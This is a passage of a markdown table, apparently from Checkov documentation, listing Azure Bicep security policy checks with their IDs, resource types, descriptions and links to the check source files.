[NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 30 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 31 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 32 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 33 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 34 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 35 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 36 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 37 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 38 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 39 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 40 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 41 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 42 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 43 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 44 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 45 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 46 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 47 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 48 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 49 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 50 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 51 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 52 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 53 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 54 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 55 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | Bicep | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 56 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | Bicep | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 57 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | Bicep | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 58 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Bicep | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 59 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 60 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | Bicep | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 61 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | Bicep | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 62 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Bicep | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 63 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | Bicep | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 64 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | Bicep | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 65 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | Bicep | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 66 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 67 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 68 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | Bicep | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 69 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 70 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | Bicep | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 71 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 72 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 73 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 74 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Bicep | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 75 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | Bicep | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 76 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | Bicep | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 77 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | Bicep | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 78 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Bicep | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) | +| 79 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | Bicep | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 80 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 81 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 82 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 83 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 84 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 85 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 86 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 87 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 88 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 89 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 90 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 91 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 92 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 93 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 94 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 95 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 96 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 97 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 98 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 99 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 100 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 101 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 102 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 103 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 104 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | +| 105 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | +| 106 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | +| 107 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 108 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) | +| 109 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 110 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 111 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 112 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 113 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 114 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 115 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | 